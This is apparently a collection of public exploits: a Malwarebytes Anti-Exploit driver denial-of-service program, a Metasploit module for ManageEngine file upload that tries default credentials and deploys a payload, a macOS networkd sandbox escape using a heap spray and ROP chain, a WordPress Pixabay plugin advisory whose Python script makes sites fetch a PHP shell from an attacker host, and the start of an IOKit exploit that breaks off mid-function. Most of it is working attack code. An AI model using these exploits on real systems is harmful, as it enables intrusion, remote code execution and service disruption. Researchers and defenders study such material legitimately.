<http://about.me/shyamkumar.somana?promo=email_sig> Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam | in.linkedin.com/in/sshyamkumar/ |
-
Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service
/*
Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date             - 19th January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.malwarebytes.org
Tested Version   - 1.03.1.1220, 1.04.1.1012
Driver Version   - no version set - mbae.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB            - http://www.osvdb.org/show/osvdb/114249
CVE ID           - CVE-2014-100039
Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version    - 1.05
Fixed driver ver - no version set
*/
#include <stdio.h>
#include <windows.h>

#define BUFSIZE 25

/*
 * Open the mbae.sys control device and send it one IOCTL with a 25-byte
 * input buffer. The first four bytes are "\xff\xff\xff\x00" and the rest is
 * 0x41 padding; the variable name suggests the leading bytes are a length
 * field the driver trusts, which would explain the out-of-bounds read in
 * the title -- confirm against the fixed 1.05 driver. A reachable DoS of
 * this kind is a kernel-side input validation bug; the defender action is
 * upgrading to the fixed version listed in the header.
 *
 * Returns 0 after sending, -1 if the device cannot be opened.
 */
int main(int argc, char *argv[])
{
    HANDLE hDevice;
    char devhandle[MAX_PATH];
    DWORD dwRetBytes = 0;
    /* NOTE(review): a char[4] initialised from a four-character literal drops
     * the implicit NUL; this is legal in C but an error in C++. */
    BYTE sizebytes[4] = "\xff\xff\xff\x00";
    BYTE *inbuffer;
    printf("-------------------------------------------------------------------------------\n");
    printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
    printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
    printf("-------------------------------------------------------------------------------\n\n");
    /* Device name "\\.\ESProtectionDriver". */
    sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
    /* NOTE(review): VirtualAlloc's result is not NULL-checked before memset. */
    inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memset(inbuffer, 0x41, BUFSIZE);
    memcpy(inbuffer, sizebytes, sizeof(sizebytes));
    printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    if(hDevice == INVALID_HANDLE_VALUE) {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    } else {
        printf("\n[+] Open %s device successful", devhandle);
    }
    printf("\n[~] Press any key to DoS . . .");
    /* NOTE(review): getch() is declared in <conio.h>, which is not included. */
    getch();
    /* IOCTL 0x0022e000, input buffer only; no output buffer and the return
     * value is not checked. */
    DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
    printf("\n[+] DoS buffer sent\n\n");
    CloseHandle(hDevice);
    return 0;
}
-
ManageEngine (Multiple Products) - (Authenticated) Arbitrary File Upload (Metasploit)
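##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ManageEngine Multiple Products Authenticated File Upload',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
        AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that
        accepts the upload does not handle correctly '../' sequences, which can be abused to
        write in the file system. Authentication is needed to exploit this vulnerability, but
        this module will attempt to login using the default credentials for the administrator
        and guest accounts. Alternatively you can provide a pre-authenticated cookie or a
        username / password combo. For IT360 targets enter the RPORT of the ServiceDesk
        instance (usually 8400). All versions of ServiceDesk prior v9 build 9031 (including
        MSP but excluding v4), AssetExplorer, SupportCenter and IT360 (including MSP) are
        vulnerable. At the time of release of this module, only ServiceDesk v9 has been fixed
        in build 9031 and above. This module has been tested successfully in Windows and
        Linux on several versions.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-5301'],
          ['OSVDB', '116733'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
          ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'     => false, # Privileged on Windows but not on Linux targets
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
            { 'attachment_path' => '/workorder/Attachment.jsp' } ],
          [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
            { 'attachment_path' => '/common/FileAttachment.jsp' } ],
          [ 'IT360 v8-v10.4',
            { 'attachment_path' => '/common/FileAttachment.jsp' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 15 2014'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('JSESSIONID', [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
        OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
        OptString.new('USERNAME', [true, 'The username to login as', 'guest']),
        OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']),
        OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to'])
      ], self.class)
  end

  # Fingerprint product and version from the landing page.
  #
  # Returns [major, minor, build, product] where product is 'sd' (ServiceDesk),
  # 'ae' (AssetExplorer), 'sc' (SupportCenter) or 'it' (IT360). Fields that
  # could not be read keep the sentinel [9999, 9999, 0, 'sd'], so callers must
  # treat that as "unknown" rather than as a real version. All four fields are
  # always Integer/Integer/Integer/String: check() compares build numerically.
  def get_version
    res = send_request_cgi({
      'uri'    => '/',
      'method' => 'GET'
    })

    version = [ 9999, 9999, 0, 'sd' ]

    if res && res.code == 200
      body = res.body.to_s
      if body =~ /ManageEngine ServiceDesk/
        if body =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
          output = $1
          # build is 0 (Integer) here, not the String '0' the original used:
          # String < Integer raises ArgumentError in check() when no build
          # regex below matches.
          version = [output[0].to_i, output[2].to_i, 0, 'sd']
        end
        if body =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/
          # newer builds
          version[2] = $1.to_i
        elsif body =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
          # older builds
          version[2] = $1.to_i
        end
      elsif body =~ /ManageEngine AssetExplorer/
        if body =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
           body =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
          output = $1
          version = [output[0].to_i, output[2].to_i, 0, 'ae']
        end
        if body =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
          version[2] = $1.to_i
        end
      elsif body =~ /ManageEngine SupportCenter Plus/
        # All of the vulnerable sc installations are "old style", so we don't care
        # about the major / minor version ...
        version[3] = 'sc'
        if body =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
          # ... but get the build number if we can find it
          version[2] = $1.to_i
        end
      elsif body =~ /\/console\/ConsoleMain\.cc/
        # IT360 newer versions
        version[3] = 'it'
      end
    elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
      # IT360 older versions, not a very good detection string but there is no alternative?
      version[3] = 'it'
    end

    version
  end

  # Map the fingerprint to a CheckCode. IT360 (and anything that could not be
  # fingerprinted) lands on Unknown, because the landing page gives no version.
  def check
    version = get_version

    # TODO: put fixed version on the two ifs below once (if...) products are fixed
    # sd was fixed on build 9031
    # ae and sc still not fixed
    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
       (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
       (version[3] == 'sc' && version[2] < 99999)
      return Exploit::CheckCode::Appears
    end

    if (version[2] > 9030 && version[3] == 'sd') ||
       (version[2] > 99999 && version[3] == 'ae') ||
       (version[2] > 99999 && version[3] == 'sc')
      return Exploit::CheckCode::Safe
    else
      # An IT360 check always lands here, there is no way to get the version easily
      return Exploit::CheckCode::Unknown
    end
  end

  # POST credentials to IT360's central login endpoint (port and path come from
  # the redirect issued by '/'). Returns the response's cookie string when it
  # carries a real IAMAGENTTICKET value, nil otherwise.
  def authenticate_it360(port, path, username, password)
    vars_post = {
      'LOGIN_ID'    => username,
      'PASSWORD'    => password,
      'isADEnabled' => 'false'
    }
    unless datastore['DOMAIN_NAME'].nil?
      vars_post['isADEnabled'] = 'true'
      vars_post['domainName']  = datastore['DOMAIN_NAME']
    end

    res = send_request_cgi({
      'rport'     => port,
      'method'    => 'POST',
      'uri'       => normalize_uri(path),
      'vars_get'  => {
        'service'   => 'ServiceDesk',
        'furl'      => '/',
        'timestamp' => Time.now.to_i
      },
      'vars_post' => vars_post
    })

    # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
      return res.get_cookies
    end
    nil
  end

  # Suffix of the IAMAGENTTICKET cookie name (it varies per installation).
  # Returns nil when '/' does not answer or sets no such cookie; the original
  # raised NoMethodError on a nil response.
  def get_it360_cookie_name
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("/")
    })
    return nil if res.nil?

    if res.get_cookies =~ /IAMAGENTTICKET([A-Z]{0,4})/
      $1
    else
      nil
    end
  end

  # Obtain an IT360 session cookie: use the supplied IAMAGENTTICKET if any,
  # else try the configured credentials and then the default admin accounts.
  # Returns the cookie string or nil.
  def login_it360
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['IAMAGENTTICKET']
      cookie_name = get_it360_cookie_name
      if cookie_name.nil?
        # would otherwise raise TypeError on the String concatenation below
        print_error("#{peer} - Could not determine the IAMAGENTTICKET cookie name")
        return nil
      end
      return 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
    end

    # get the correct path, host and port
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('/')
    })
    if res && res.redirect?
      uri = [ res.redirection.port, res.redirection.path ]
    else
      return nil
    end

    cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
    return cookie unless cookie.nil?

    if datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'].nil?
      # we've tried with the default guest password, now let's try with the default admin password
      cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
      return cookie unless cookie.nil?

      # Try one more time with the default admin login for some versions
      cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
      return cookie unless cookie.nil?
    end

    nil
  end

  #
  # Authenticate and validate our session cookie. We need to submit credentials to
  # j_security_check and then follow the redirect to HomePage.do to create a valid
  # authenticated session.
  #
  # Returns true when the server accepted the credentials for the given cookie.
  #
  def authenticate(cookie, username, password)
    res = send_request_cgi!({
      'method'    => 'POST',
      'uri'       => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
      'ctype'     => 'application/x-www-form-urlencoded',
      'cookie'    => cookie,
      'vars_post' => {
        'j_username'      => username,
        'j_password'      => password,
        'logonDomainName' => datastore['DOMAIN_NAME']
      }
    })

    # sd and ae respond with 302 while sc responds with a 200
    if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
      return true
    else
      return false
    end
  end

  # Obtain a session cookie for the non-IT360 products: use the supplied
  # JSESSIONID if any, else fetch a fresh one from '/' and authenticate it with
  # the configured credentials, then the default admin accounts.
  # Returns the cookie string or nil.
  def login
    # Do we already have a valid cookie? If yes, just return that.
    unless datastore['JSESSIONID'].nil?
      return 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
    end

    # First we get a valid JSESSIONID to pass to authenticate()
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('/')
    })
    return nil unless res && res.code == 200

    cookie = res.get_cookies
    return cookie if authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])

    if datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'].nil?
      # we've tried with the default guest password, now let's try with the default admin password
      return cookie if authenticate(cookie, 'administrator', 'administrator')

      # Try one more time with the default admin login for some versions
      return cookie if authenticate(cookie, 'admin', 'admin')
    end

    nil
  end

  # Upload payload_str as an attachment called payload_name. For an .ear the
  # directory field carries the traversal that lands in the JBoss hot-deploy
  # directory relative to the attachment store; any other name goes into a
  # random directory (used to make the server create the path first).
  # Returns the raw HTTP response (may be nil).
  def send_multipart_request(cookie, payload_name, payload_str)
    if payload_name =~ /\.ear/
      upload_path = '../../server/default/deploy'
    else
      upload_path = rand_text_alpha(4+rand(4))
    end

    post_data = Rex::MIME::Message.new
    if @my_target == targets[1]
      # old style
      post_data.add_part(payload_str, 'application/octet-stream', 'binary',
        "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
      post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
      post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
      post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
      post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
      post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
      post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
      post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
    else
      post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
      post_data.add_part(payload_str, 'application/octet-stream', 'binary',
        "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
      post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
    end

    data = post_data.to_s

    res = send_request_cgi({
      'uri'    => normalize_uri(@my_target['attachment_path']),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => cookie
    })

    return res
  end

  # Resolve the 'Automatic' target from the fingerprint. Note that an
  # un-fingerprintable host (sentinel version) falls through to targets[2].
  def pick_target
    return target if target.name != 'Automatic'

    version = get_version
    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
       (version[0] == 4 && version[3] == 'ae') ||
       (version[3] == 'sc')
      # These are all "old style" versions (sc is always old style)
      return targets[1]
    elsif version[3] == 'it'
      return targets[3]
    else
      return targets[2]
    end
  end

  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
    end

    print_status("#{peer} - Selecting target...")
    @my_target = pick_target
    print_status("#{peer} - Selected target #{@my_target.name}")

    if @my_target == targets[3]
      cookie = login_it360
    else
      cookie = login
    end

    if cookie.nil?
      fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
    end

    # First we generate the WAR with the payload...
    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => war_app_base })

    # ... and then we create an EAR file that will contain it.
    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
    app_xml << '<application>'
    app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
    app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
    app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"

    # Zipping with CM_STORE to avoid errors while decompressing the zip
    # in the Java vulnerable application
    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
    ear_file.add_file('META-INF/application.xml', app_xml)
    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'

    if @my_target != targets[3]
      # Linux doesn't like it when we traverse non existing directories,
      # so let's create them by sending some random data before the EAR.
      # (IT360 does not have a Linux version so we skip the bogus file for it)
      print_status("#{peer} - Uploading bogus file...")
      res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
      # A nil response (timeout, connection dropped) is a failure too; the
      # original only failed on a non-200 status and carried on when res was nil.
      unless res && res.code == 200
        fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
      end
    end

    # Now send the actual payload
    print_status("#{peer} - Uploading EAR file...")
    res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful")
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
    end

    # The EAR is picked up by the container's deployment scanner, which takes a
    # few seconds; poll the context root until it answers or we give up.
    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
        'method' => 'GET'
      })

      # Failure. The request timed out or the server went away.
      break if res.nil?

      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end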
Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape
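// Requires Lorgnette: https://github.com/rodionovd/liblorgnette
// clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
// ianbeer

#include <dlfcn.h>
#include <float.h>      /* DBL_MAX, used in main(); missing from the original */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>
#include <mach-o/dyld_images.h>
#include "liblorgnette/lorgnette.h"

/*
 * Return the load address of the first image in *this* process whose path
 * contains library_name, or NULL on failure. It is used to locate the ROP
 * gadgets that will run inside networkd; that only works if CoreFoundation is
 * mapped at the same address in both processes (dyld shared cache -- not
 * verified here).
 */
static void *find_library_load_address(const char *library_name)
{
    // get the list of all loaded modules from dyld:
    // TASK_DYLD_INFO yields the address of dyld's all_image_infos struct, from
    // which we read the names and load addresses of all modules
    task_dyld_info_data_t task_dyld_info;
    mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
    kern_return_t err = task_info(mach_task_self(), TASK_DYLD_INFO,
                                  (task_info_t)&task_dyld_info, &count);
    if (err != KERN_SUCCESS) {
        fprintf(stderr, "task_info(TASK_DYLD_INFO) failed: %d\n", err);
        return NULL;
    }

    const struct dyld_all_image_infos *all_image_infos =
        (const struct dyld_all_image_infos *)task_dyld_info.all_image_info_addr;
    const struct dyld_image_info *image_infos = all_image_infos->infoArray;

    for (uint32_t i = 0; i < all_image_infos->infoArrayCount; i++) {
        const char *image_name = image_infos[i].imageFilePath;
        if (image_name != NULL && strstr(image_name, library_name) != NULL) {
            return (void *)image_infos[i].imageLoadAddress;
        }
    }
    return NULL;
}

/*
 * One 4 KiB page of the heap spray. Field order and sizes are the ABI of the
 * fake Objective-C object networkd ends up dereferencing: do not reorder or
 * resize anything here.
 */
struct heap_spray {
    void *fake_objc_class_ptr;          // isa -> fake_objc_class below
    uint8_t pad0[0x10];
    uint64_t first_gadget;              // landed on after the stack pivot
    uint8_t pad1[0x8];
    uint64_t null0;
    uint64_t pad3;
    uint64_t pop_rdi_rbp_ret;
    uint64_t rdi;                       // -> command
    uint64_t rbp;
    uint64_t system;                    // system(3)
    struct fake_objc_class_t {
        char pad[0x10];
        void *cache_buckets_ptr;        // -> fake_cache_bucket below
        uint64_t cache_bucket_mask;
    } fake_objc_class;
    struct fake_cache_bucket_t {
        void *cached_sel;               // must equal the selector being sent
        void *cached_function;          // becomes RIP
    } fake_cache_bucket;
    char command[256];
};

/*
 * Open the com.apple.networkd XPC service. Named networkd_connect rather than
 * connect(): a global symbol called `connect` in the executable would shadow
 * the libc connect(2) that libxpc/CoreFoundation may call.
 */
static xpc_connection_t networkd_connect(void)
{
    xpc_connection_t conn = xpc_connection_create_mach_service(
        "com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);

    xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
        xpc_type_t t = xpc_get_type(event);
        if (t == XPC_TYPE_ERROR) {
            printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
        }
        printf("received an event\n");
    });

    xpc_connection_resume(conn);
    return conn;
}

/*
 * Build the spray page, replicate it 0x40000 times (1 GiB) into one XPC data
 * item, and send the message whose "effective_audit_token" (16 bytes set via
 * the uuid setter) carries the pointer 0x120200000 in its upper 8 bytes --
 * the type confusion: networkd consumes those bytes as something it then
 * dereferences, landing in the spray. Exits the process on any setup error.
 */
static void go(void)
{
    void *heap_spray_target_addr = (void *)0x120202000;
    struct heap_spray *hs = mmap(heap_spray_target_addr, 0x1000, PROT_READ | PROT_WRITE,
                                 MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
    if (hs == MAP_FAILED) {
        perror("mmap(spray template)");
        exit(1);
    }
    memset(hs, 'C', 0x1000);
    hs->null0 = 0;

    hs->fake_objc_class_ptr = &hs->fake_objc_class;
    hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
    hs->fake_objc_class.cache_bucket_mask = 0;

    // nasty hack to find the correct selector address :)
    // read the RIP-relative msgref operand inside _dispatch_objc_release;
    // the 0x16/0x1a offsets are specific to the libdispatch build it was
    // written against
    uint8_t *ptr = (uint8_t *)(uintptr_t)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
    if (ptr == NULL) {
        fprintf(stderr, "could not resolve _dispatch_objc_release\n");
        exit(1);
    }
    uint64_t *msgrefs = (uint64_t *)(ptr + 0x1a + (*(int32_t *)(ptr + 0x16)));
    uint64_t sel = msgrefs[1];
    printf("sel: 0x%llx\n", (unsigned long long)sel);
    hs->fake_cache_bucket.cached_sel = (void *)(uintptr_t)sel;

    uint8_t *CoreFoundation_base = find_library_load_address("CoreFoundation");
    if (CoreFoundation_base == NULL) {
        fprintf(stderr, "could not find CoreFoundation load address\n");
        exit(1);
    }

    // gadget offsets are for the CoreFoundation build the author targeted
    // pivot:
    /*
      push rax
      add eax, [rax]
      add [rbx+0x41], bl
      pop rsp
      pop r14
      pop r15
      pop rbp
      ret
    */
    hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0;

    // ROP from here
    // jump over the NULL then so there's more space:
    // pop, pop, pop, ret -- and keep stack correctly aligned
    hs->first_gadget    = (uint64_t)(uintptr_t)(CoreFoundation_base + 0x46ef7);
    hs->pop_rdi_rbp_ret = (uint64_t)(uintptr_t)(CoreFoundation_base + 0x2226);
    hs->system          = (uint64_t)(uintptr_t)dlsym(RTLD_DEFAULT, "system");
    hs->rdi             = (uint64_t)(uintptr_t)&hs->command;
    strcpy(hs->command, "touch /tmp/hello_networkd");

    size_t heap_spray_pages = 0x40000;
    size_t heap_spray_bytes = heap_spray_pages * 0x1000;   // 1 GiB
    char *heap_spray_copies = malloc(heap_spray_bytes);
    if (heap_spray_copies == NULL) {
        perror("malloc(spray)");
        exit(1);
    }
    for (size_t i = 0; i < heap_spray_pages; i++) {
        memcpy(heap_spray_copies + (i * 0x1000), hs, 0x1000);
    }

    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
    xpc_dictionary_set_uint64(msg, "type", 6);
    xpc_dictionary_set_uint64(msg, "connection_id", 1);

    xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);

    xpc_object_t conn_list = xpc_array_create(NULL, 0);
    xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_string(arr_dict, "hostname", "example.com");
    xpc_array_append_value(conn_list, arr_dict);
    xpc_dictionary_set_value(params, "connection_entry_list", conn_list);

    // 1023-byte key; presumably there to shape the receiver's heap -- the
    // author does not say
    char *long_key = malloc(1024);
    if (long_key == NULL) {
        perror("malloc(key)");
        exit(1);
    }
    memset(long_key, 'A', 1023);
    long_key[1023] = '\x00';
    xpc_dictionary_set_string(params, long_key, "something or other that's not important");

    // 16 bytes handed over as a uuid; the second qword points 0x2000 below
    // the spray template address, inside the sprayed region
    uint64_t uuid[] = {0, 0x120200000};
    xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char *)uuid);

    xpc_dictionary_set_uint64(params, "start", 0);
    xpc_dictionary_set_uint64(params, "duration", 0);

    xpc_dictionary_set_value(msg, "parameters", params);

    xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_int64(state, "power_slot", 0);
    xpc_dictionary_set_value(msg, "state", state);

    xpc_connection_t conn = networkd_connect();
    printf("connected\n");

    xpc_connection_send_message(conn, msg);
    printf("enqueued message\n");

    xpc_connection_send_barrier(conn, ^{
        printf("other side has enqueued this message\n");
    });

    xpc_release(msg);
}

int main(void)
{
    go();
    printf("entering CFRunLoop\n");
    // keep the process alive so the XPC reply / error events are delivered
    for (;;) {
        CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
    }
    return 0;
}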
WordPress Plugin Pixabay Images 2.3 - Multiple Vulnerabilities
Mogwai Security Advisory MSA-2015-01 ---------------------------------------------------------------------- Title: WP Pixabay Images Multiple Vulnerabilities Product: Pixabay Images (Wordpress Plugin) Affected versions: 2.3 Impact: high Remote: yes Product link: https://wordpress.org/plugins/pixabay-images/ Reported: 14/01/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- Pixabay Images is a WordPress plugin that lets you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required. Business recommendation: ---------------------------------------------------------------------- Update to version 2.4 Vulnerability description: ---------------------------------------------------------------------- 1) Authentication bypass The plugin does not check whether the user is logged in before handling its upload request, so the code described below can be reached without any authentication. 2) Arbitrary file upload The plugin fetches the image from whatever host is named in the supplied download URL without validating it, so an attacker can make the site download and store arbitrary files from a host they control, including PHP code. 3) Path Traversal Certain request values are used in a file path without being sanitized, which allows files to be stored outside of the "download" folder. 4) Cross Site Scripting (XSS) The generated author link uses unsanitized user-supplied values, which can be abused for Cross Site Scripting (XSS) attacks. Proof of concept: ---------------------------------------------------------------------- The following PoC Python script makes the target download a PHP file from an attacker-controlled host and store it via the path traversal; it combines issues 1), 2) and 3).
#!/usr/bin/env python import argparse import httplib, urllib from urlparse import urlparse def exploit(target_url, shellcode_url): target = urlparse(target_url) params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url, 'image_user': 'none', 'q':'xxx/../../../../../../mogwai'}) headers = headers = {"Content-type": "application/x-www-form-urlencoded"} print "[+] Sending download request...." conn = httplib.HTTPConnection(target.netloc) conn.request("POST", target.path + "/wp-admin/", params, headers) response = conn.getresponse() response_data = response.read() if response.status != 200 and response_data != "Error: File attachment metadata error": print "[-] Something went wrong" print response_data exit() conn.close() # ---- Main code ---------------- parser = argparse.ArgumentParser() parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/") parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php") print "----------------------------------------------" print " pixabay upload wordpress plugin exploit PoC" print " Mogwai security" print "----------------------------------------------" arguments = parser.parse_args() exploit(arguments.target_url, arguments.shellcode_url) Vulnerable / tested versions: ---------------------------------------------------------------------- Pixabay Images 2.3 Disclosure timeline: ---------------------------------------------------------------------- 14/01/2014: Reporting issues to the plugin author 15/01/2014: Release of fixed version (2.4) 19/01/2014: Public advisory Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de
Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference
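// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
// ianbeer
//
// The -m32 build is not optional: the trigger maps page zero, which a 64-bit
// process on OS X cannot do (presumably why the author built it 32-bit).

#include <fcntl.h>      /* open(), O_RDONLY -- missing from the original */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memmem/memcpy/strcmp -- missing from the original */
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>

/*
 * Run a shell pipeline that prints a 16-hex-digit value and parse it.
 * Returns 0 on any failure (popen error, short read); 0 is never a valid
 * result for the callers below.
 */
static uint64_t read_hex_from_cmd(const char *cmd)
{
    FILE *f = popen(cmd, "r");
    if (f == NULL) {
        perror("popen");
        return 0;
    }
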